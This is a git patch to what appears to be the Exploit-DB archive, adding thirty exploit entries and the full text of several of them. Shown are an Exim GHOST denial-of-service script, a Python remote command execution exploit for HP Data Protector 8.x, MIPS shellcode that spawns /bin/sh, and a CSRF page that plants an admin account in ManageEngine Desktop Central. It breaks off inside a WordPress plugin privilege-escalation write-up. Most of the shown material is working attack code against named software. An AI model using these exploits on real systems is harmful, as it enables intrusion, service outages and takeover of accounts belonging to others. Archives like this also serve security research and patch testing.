From 7fe14b4b98b0fbfaf2997711fbca8f0e847c27fb Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 5 Feb 2015 08:37:11 +0000
Subject: [PATCH] Update: 2015-02-05

30 new exploits
---
 files.csv                             |  32 ++-
 platforms/linux/dos/35951.py          |  61 ++++
 platforms/linux/remote/35961.py       |  69 +++++
 platforms/linux/shellcode/35868.c     |  47 ++++
 platforms/multiple/webapps/35980.html |  45 +++
 platforms/php/webapps/35823.txt       |  61 ++++
 platforms/php/webapps/35860.txt       |  36 +++
 platforms/php/webapps/35879.txt       | 112 ++++++++
 platforms/php/webapps/35916.txt       |  34 +++
 platforms/php/webapps/35950.txt       | 127 +++++++++
 platforms/php/webapps/35975.txt       |   7 +
 platforms/php/webapps/35976.txt       |   7 +
 platforms/php/webapps/35977.txt       |   7 +
 platforms/php/webapps/35978.txt       |  15 +
 platforms/php/webapps/35979.txt       |   7 +
 platforms/php/webapps/35984.txt       |   9 +
 platforms/php/webapps/35985.txt       |   9 +
 platforms/php/webapps/35986.txt       |   9 +
 platforms/php/webapps/35987.txt       |   9 +
 platforms/php/webapps/35988.txt       |   9 +
 platforms/php/webapps/35989.txt       |   9 +
 platforms/php/webapps/35990.txt       |  39 +++
 platforms/windows/dos/35889.py        |  96 +++++++
 platforms/windows/local/35812.py      |  71 +++++
 platforms/windows/local/35813.py      |  69 +++++
 platforms/windows/local/35962.c       | 302 ++++++++++++++++++++
 platforms/windows/local/35964.c       | 384 ++++++++++++++++++++++++++
 platforms/windows/local/35983.rb      | 131 +++++++++
 platforms/windows/remote/35948.html   | 272 ++++++++++++++++++
 platforms/windows/remote/35949.txt    |  89 ++++++
 platforms/windows/webapps/35982.txt   | 122 ++++++++
 31 files changed, 2295 insertions(+), 1 deletion(-)
 create mode 100755 platforms/linux/dos/35951.py
 create mode 100755 platforms/linux/remote/35961.py
 create mode 100755 platforms/linux/shellcode/35868.c
 create mode 100755 platforms/multiple/webapps/35980.html
 create mode 100755 platforms/php/webapps/35823.txt
 create mode 100755 platforms/php/webapps/35860.txt
 create mode 100755 platforms/php/webapps/35879.txt
 create mode 100755 platforms/php/webapps/35916.txt
 create mode 100755 platforms/php/webapps/35950.txt
 create mode 100755 platforms/php/webapps/35975.txt
 create mode 100755 platforms/php/webapps/35976.txt
 create mode 100755 platforms/php/webapps/35977.txt
 create mode 100755 platforms/php/webapps/35978.txt
 create mode 100755 platforms/php/webapps/35979.txt
 create mode 100755 platforms/php/webapps/35984.txt
 create mode 100755 platforms/php/webapps/35985.txt
 create mode 100755 platforms/php/webapps/35986.txt
 create mode 100755 platforms/php/webapps/35987.txt
 create mode 100755 platforms/php/webapps/35988.txt
 create mode 100755 platforms/php/webapps/35989.txt
 create mode 100755 platforms/php/webapps/35990.txt
 create mode 100755 platforms/windows/dos/35889.py
 create mode 100755 platforms/windows/local/35812.py
 create mode 100755 platforms/windows/local/35813.py
 create mode 100755 platforms/windows/local/35962.c
 create mode 100755 platforms/windows/local/35964.c
 create mode 100755 platforms/windows/local/35983.rb
 create mode 100755 platforms/windows/remote/35948.html
 create mode 100755 platforms/windows/remote/35949.txt
 create mode 100755 platforms/windows/webapps/35982.txt

diff --git a/files.csv b/files.csv
index 838b01057..ae31ae422 100755
--- a/files.csv
+++ b/files.csv
@@ -32268,6 +32268,8 @@ id,file,description,date,author,platform,type,port
 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-05-31,Kalashinkov3,windows,remote,0
 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0
 35811,platforms/windows/local/35811.txt,"Windows < 8.1 (32/64 bit) - Privilege Escalation (User Profile Service) (MS15-003)",2015-01-18,"Google Security Research",windows,local,0
+35812,platforms/windows/local/35812.py,"T-Mobile Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0
+35813,platforms/windows/local/35813.py,"Congstar Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0
 35814,platforms/php/webapps/35814.txt,"TEDE Simplificado  v1.01/vS2.04 Multiple SQL Injection Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
 35815,platforms/php/webapps/35815.pl,"PikaCMS Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
 35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat  3.3-rc2 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-06-01,"High-Tech Bridge SA",php,webapps,0
@@ -32277,6 +32279,7 @@ id,file,description,date,author,platform,type,port
 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
 35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0
 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
+35823,platforms/php/webapps/35823.txt,"Wordpress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80
 35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
 35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - (Corrupted mp4) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0
@@ -32310,6 +32313,7 @@ id,file,description,date,author,platform,type,port
 35857,platforms/php/webapps/35857.txt,"ArticleFR CMS 3.0.5 - SQL Injection Vulnerability",2015-01-21,TranDinhTien,php,webapps,0
 35858,platforms/php/webapps/35858.txt,"ArticleFR CMS 3.0.5 - Arbitrary File Upload",2015-01-21,TranDinhTien,php,webapps,0
 35859,platforms/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash PoC",2015-01-21,"Kaczinski Ramirez",hardware,dos,0
+35860,platforms/php/webapps/35860.txt,"vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection",2015-01-20,Technidev,php,webapps,80
 35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0
 35862,platforms/php/webapps/35862.txt,"miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0
 35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 HTML-injection and SQL Injection Vulnerabilities",2011-06-15,"Robin Verton",php,webapps,0
@@ -32317,6 +32321,7 @@ id,file,description,date,author,platform,type,port
 35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection Vulnerabilities",2011-06-19,KedAns-Dz,php,webapps,0
 35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2011-06-18,KedAns-Dz,php,webapps,0
 35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting Vulnerability",2011-06-18,Bl4ck.Viper,php,webapps,0
+35868,platforms/linux/shellcode/35868.c,"Linux MIPS execve (36 bytes)",2015-01-22,Sanguine,linux,shellcode,0
 35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption Vulnerability",2015-01-21,"Kapil Soni",windows,dos,0
 35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda M. Jayathissa",windows,dos,0
 35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0
@@ -32327,6 +32332,7 @@ id,file,description,date,author,platform,type,port
 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0
 35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
 35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection And Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0
+35879,platforms/php/webapps/35879.txt,"Wordpress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0
 35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp ActiveX Control 'SaveMessage()' Insecure Method Vulnerability",2011-06-23,"High-Tech Bridge SA",windows,remote,0
 35881,platforms/windows/remote/35881.c,"xAurora 10.00 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2011-06-24,"Zer0 Thunder",windows,remote,0
 35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
@@ -32335,6 +32341,7 @@ id,file,description,date,author,platform,type,port
 35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 'Initialize()' Method Stack Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0
 35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 'ADS' Process Off By One Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0
 35887,platforms/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation Vulnerability",2015-01-22,"Glafkos Charalambous ",hardware,remote,0
+35889,platforms/windows/dos/35889.py,"IceCream Ebook Reader 1.41 - Crash PoC",2015-01-23,"Kapil Soni",windows,dos,0
 35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0
 35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080
 35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 SQL Injection Vulnerability",2011-06-27,"Qihan Luo",multiple,remote,0
@@ -32357,6 +32364,7 @@ id,file,description,date,author,platform,type,port
 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct Denial of Service",2015-01-26,"Core Security",android,dos,0
 35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80
 35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0
+35916,platforms/php/webapps/35916.txt,"Wordpress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80
 35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0
 35918,platforms/multiple/remote/35918.c,"IBM DB2 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution Vulnerability",2011-06-30,"Tim Brown",multiple,remote,0
 35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow Vulnerability",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
@@ -32387,7 +32395,11 @@ id,file,description,date,author,platform,type,port
 35945,platforms/php/webapps/35945.txt,"Chyrp 2.x URI action Parameter Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0
 35946,platforms/php/webapps/35946.txt,"Chyrp 2.x includes/lib/gz.php file Parameter Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0
 35947,platforms/php/webapps/35947.txt,"Chyrp 2.x swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0
-35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,ParvezGHH,windows,local,0
+35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - Full ASLR & DEP Bypass",2015-01-30,Rh0,windows,remote,0
+35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0
+35950,platforms/php/webapps/35950.txt,"NPDS CMS Revolution-13 - SQL Injection Vulnerability",2015-01-24,"Narendra Bhati",php,webapps,80
+35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 glibc gethostbyname - Denial of Service",2015-01-29,1n3,linux,dos,0
+35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
 35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox 'id' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
 35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
 35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
@@ -32395,6 +32407,9 @@ id,file,description,date,author,platform,type,port
 35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
 35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
 35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
+35961,platforms/linux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",linux,remote,0
+35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0
+35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0
 35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross Site Scripting Vulnerability",2011-07-15,SOLVER,php,webapps,0
 35966,platforms/php/webapps/35966.txt,"Joomla! 'com_newssearch' Component SQL Injection Vulnerability",2011-07-15,"Robert Cooper",php,webapps,0
 35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
@@ -32405,3 +32420,18 @@ id,file,description,date,author,platform,type,port
 35972,platforms/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injection Vulnerabilities",2015-02-02,"ITAS Team",php,webapps,0
 35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0
 35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware <= 7.2 'snarf_ajax.php' Cross Site Scripting Vulnerability",2011-07-20,"High-Tech Bridge SA",php,webapps,0
+35975,platforms/php/webapps/35975.txt,"Cyberoam UTM Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"Patrick Webster",php,webapps,0
+35976,platforms/php/webapps/35976.txt,"Synergy Software 'id' Parameter SQL Injection Vulnerability",2011-07-21,Ehsan_Hp200,php,webapps,0
+35977,platforms/php/webapps/35977.txt,"Godly Forums 'id' Parameter SQL Injection Vulnerability",2011-07-25,3spi0n,php,webapps,0
+35978,platforms/php/webapps/35978.txt,"Online Grades 3.2.5 Multiple Cross Site Scripting Vulnerabilities",2011-07-25,"Gjoko Krstic",php,webapps,0
+35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition 'viewRecipe.php' SQL Injection Vulnerability",2011-07-25,Lazmania61,php,webapps,0
+35980,platforms/multiple/webapps/35980.html,"ManageEngine Desktop Central 9 Build 90087 - CSRF Vulnerability",2015-02-03,"Mohamed Idris",multiple,webapps,8020
+35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080
+35983,platforms/windows/local/35983.rb,"MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",2015-02-03,metasploit,windows,local,0
+35984,platforms/php/webapps/35984.txt,"Joomla! Virtual Money 1.5 'com_virtualmoney' Component SQL Injection Vulnerability",2011-07-25,FL0RiX,php,webapps,0
+35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
+35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
+35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
+35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
+35989,platforms/php/webapps/35989.txt,"MBoard 1.3 'url' Parameter URI Redirection Vulnerability",2011-07-27,"High-Tech Bridge SA",php,webapps,0
+35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0
diff --git a/platforms/linux/dos/35951.py b/platforms/linux/dos/35951.py
new file mode 100755
index 000000000..1509943d2
--- /dev/null
+++ b/platforms/linux/dos/35951.py
@@ -0,0 +1,61 @@
+# Exploit Title: [Exim ESMTP GHOST DoS PoC Exploit]
+# Date: [1/29/2015]
+# Exploit Author: [1N3]
+# Vendor Homepage: [www.exim.org]
+# Version: [4.80 or less]
+# Tested on: [debian-7-7-64b]
+# CVE : [2015-0235]
+
+#!/usr/bin/python
+# Exim ESMTP DoS Exploit by 1N3 v20150128
+# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
+# http://crowdshield.com
+#
+# USAGE: python ghost-smtp-dos.py <ip> <port>
+#
+# Escape character is '^]'.
+# 220 debian-7-7-64b ESMTP Exim 4.80 ...
+# HELO
+# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+ 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+# Connection closed by foreign host.
+#
+# user () debian-7-7-64b:~$ dmesg
+# ...
+# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
+# libc-2.13.so[7fabef2a2000+182000]
+
+import socket
+import time
+import sys, getopt
+
+def main(argv):
+    argc = len(argv)
+
+    if argc <= 1:
+            print "usage: %s <host>" % (argv[0])
+            sys.exit(0)
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+ 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
+
+    target = argv[1] # SET TARGET
+    port = argv[2] # SET PORT
+
+    print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
+    print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))
+    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    connect=s.connect((target,int(port)))
+    data = s.recv(1024)
+    print "CONNECTION: " +data
+    s.send('HELO ' + buffer + '\r\n')
+    data = s.recv(1024)
+    print "received: " +data
+    s.send('EHLO ' + buffer + '\r\n')
+    data = s.recv(1024)
+    print "received: " +data
+    s.close()
+
+main(sys.argv) 
+
diff --git a/platforms/linux/remote/35961.py b/platforms/linux/remote/35961.py
new file mode 100755
index 000000000..ddf16c5fc
--- /dev/null
+++ b/platforms/linux/remote/35961.py
@@ -0,0 +1,69 @@
+#!/usr/bin/python
+
+# Exploit Title: HP-Data-Protector-8.x Remote command execution.
+# Google Dork: -
+# Date: 30/01/2015
+# Exploit Author: Juttikhun Khamchaiyaphum
+# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
+# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
+# Version: 8.x
+# Tested on: IA64 HP Server Rx3600
+# CVE : CVE-2014-2623
+# Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. "uname -m">"
+
+import socket
+import struct
+import sys
+
+def exploit(host, port, command):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        sock.connect((host, port))
+        print "[+] Target connected."
+
+        OFFSET_DEC_START = 133
+        OFFSET_DEC = (OFFSET_DEC_START + len(command))
+        # print "OFFSET_DEC_START:" + str(OFFSET_DEC_START)
+        # print "len(command)" + str(len(command))
+        # print "OFFSET_DEC" + str(OFFSET_DEC)
+        OFFSET_HEX = "%x" % OFFSET_DEC
+        # print "OFFSET_HEX" + str(OFFSET_HEX)
+        OFFSET_USE = chr(OFFSET_DEC)
+        # print "Command Length: " + str(len(command))
+        PACKET_DATA = "\x00\x00\x00"+\
+        OFFSET_USE+\
+        "\x20\x32\x00\x20\x73\x73\x73\x73\x73\x73\x00\x20\x30" + \
+        "\x00\x20\x54\x45\x53\x54\x45\x52\x00\x20\x74\x65\x73\x74\x65\x72\x00" + \
+        "\x20\x43\x00\x20\x32\x30\x00\x20\x74\x65\x73\x65\x72\x74\x65\x73\x74" + \
+        "\x2E\x65\x78\x65\x00\x20\x72\x65\x73\x65\x61\x72\x63\x68\x00\x20\x2F" + \
+        "\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75" + \
+        "\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x30\x00" + \
+        "\x20\x32\x00\x20\x75\x74\x69\x6C\x6E\x73\x2F\x64\x65\x74\x61\x63\x68" + \
+        "\x00\x20\x2D\x64\x69\x72\x20\x2F\x62\x69\x6E\x20\x2D\x63\x6F\x6D\x20" + \
+        " %s\x00" %command
+
+        # Send payload to target
+        print "[+] Sending PACKET_DATA"
+        sock.sendall(PACKET_DATA)
+
+        # Parse the response back
+        print "[*] Result:"
+        while True:
+            response = sock.recv(2048)
+            if not response: break
+            print response
+
+    except Exception as ex:
+        print >> sys.stderr, "[-] Socket error: \n\t%s" % ex
+        exit(-3)
+    sock.close()
+
+if __name__ == "__main__":
+    try:
+        target = sys.argv[1]
+        port = int(sys.argv[2])
+        command = sys.argv[3]
+        exploit(target, port, command)
+    except IndexError:
+         print("Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. \"uname -m\">")
+    exit(0)
\ No newline at end of file
diff --git a/platforms/linux/shellcode/35868.c b/platforms/linux/shellcode/35868.c
new file mode 100755
index 000000000..e829e9568
--- /dev/null
+++ b/platforms/linux/shellcode/35868.c
@@ -0,0 +1,47 @@
+# Exploit Title: 36byte Linux MIPS execve
+# Date: 2015 - 1 - 20
+# Exploit Author: Sanguine
+# Vendor Homepage: http://sangu1ne.tistory.com/
+
+
+#include <stdio.h>
+/*
+Sanguine@debian-mipsel:~/leaveret# cat > MIPS_36b_sc.s
+.section .text
+.globl __start
+.set noreorder
+__start:
+slti $a2, $zero, -1   #set a1 to zero
+p:
+bltzal $a2, p            #not branch always and save ra
+slti $a1, $zero, -1   #set a1 to zero
+addu $a0, $ra, 4097       #a0 + 16
+addu $a0, $a0, -4081
+li $v0, 4011
+syscall  0x40404
+.string "/bin/sh"
+Sanguine@debian-mipsel:~/leaveret# as MIPS_36b_sc.s -o MIPS_36b_sc.o
+Sanguine@debian-mipsel:~/leaveret# ld MIPS_36b_sc.o -o MIPS_36b_sc
+Sanguine@debian-mipsel:~/leaveret# ./MIPS_36b_sc
+$ exit
+
+*/
+char sc[] = {
+    "\xff\xff\x06\x28" /* slti $a2, $zero, -1 */
+    "\xff\xff\xd0\x04" /* bltzal $a2, <p> */
+    "\xff\xff\x05\x28" /* slti $a1, $zero, -1  */
+    "\x01\x10\xe4\x27" /* addu $a0, $ra, 4097 */
+    "\x0f\xf0\x84\x24" /* addu $a0, $a0, -4081 */
+    "\xab\x0f\x02\x24" /* li $v0, 4011  */
+    "\x0c\x01\x01\x01" /* syscall  0x40404 */
+    "/bin/sh"
+};
+
+void
+main(void)
+{
+    void (*s)(void);
+    printf("sc size %d\n", sizeof(sc));
+    s = sc;
+    s();
+}
diff --git a/platforms/multiple/webapps/35980.html b/platforms/multiple/webapps/35980.html
new file mode 100755
index 000000000..9cb3e5381
--- /dev/null
+++ b/platforms/multiple/webapps/35980.html
@@ -0,0 +1,45 @@
+<html>
+<!--
+# Exploit Title: ManageEngine Desktop Central 9 Add and admin user through Cross-Site Request Forgery (CSRF)
+# Date: 05 December 2014
+# Exploit Author: Mohamed Idris – Help AG Middle East
+# Vendor Homepage: http://www.manageengine.com/
+# Software Link: http://www.manageengine.com/products/desktop-central/
+# Version: All versions below build 90121
+# Tested on: Version 9 Build 90087
+# CVEID: CVE-2014-9331
+# Vulnerability Fix: http://www.manageengine.com/products/desktop-central/cve20149331-cross-site-request-forgery.html
+
+POC Code:
+When an authenticated application admin clicks a link to the below code, you well get a user “Hacker” with the password “HackerPass” added to the application (convincing the admin to click on a link is so easy ;)).
+Remember to change the IP to the target server IP address in the code.
+-->
+  <!-- CSRF PoC - Add an admin account -->
+  <body>
+    <form action="http://<Server-IP>:8020/STATE_ID/1417736606982/roleMgmt.do?actionToCall=addUser&SUBREQUEST=XMLHTTP" method="POST">
+      <input type="hidden" name="AuthenticationType" value="DC" />
+      <input type="hidden" name="newDCAuthUserName" value="Hacker" />
+      <input type="hidden" name="newDCAuthUserPassword" value="HackerPass" />
+      <input type="hidden" name="DCAuthconfirmPassword" value="HackerPass" />
+      <input type="hidden" name="newDCAuthUserEmail" value="" />
+      <input type="hidden" name="newDCAuthUserPNumber" value="" />
+      <input type="hidden" name="newADAuthUserEmail" value="" />
+      <input type="hidden" name="newADAuthUserPNumber" value="" />
+      <input type="hidden" name="MapType" value="ALL" />
+      <input type="hidden" name="aduserSearch" value="" />
+      <input type="hidden" name="searchValue" value="Search" />
+      <input type="hidden" name="aduserSearchRO" value="" />
+      <input type="hidden" name="searchValue" value="Search" />
+      <input type="hidden" name="action1" value="DC_ADD_USER" />
+      <input type="hidden" name="addUser" value="Add User" />
+      <input type="hidden" name="cancle" value="Cancel" />
+      <input type="hidden" name="customerids" value="" />
+      <input type="hidden" name="roleListDCAuth" value="1" />
+      <input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" />
+      <input type="hidden" name="domainListADAuth" value="-1" />
+      <input type="hidden" name="roleListADAuth" value="-1" />
+      <input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
diff --git a/platforms/php/webapps/35823.txt b/platforms/php/webapps/35823.txt
new file mode 100755
index 000000000..4c1de233c
--- /dev/null
+++ b/platforms/php/webapps/35823.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Pie Register 2.0.13 Privilege escalation
+# Date: 16-10-2014
+# Software Link: https://wordpress.org/plugins/pie-register/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# CVE: CVE-2014-8802
+# Category: webapps
+
+1. Description
+  
+Anyone can import CSV file. Pie Register will import users from this file.
+
+File: pie-register\pie-register.php
+
+add_action( 'init', array($this,'pie_main') );
+function pie_main() {
+	// I skip unnecessary lines
+	if(isset($_FILES['csvfile']['name'])) {
+		$this->importUsers();
+	}
+}
+
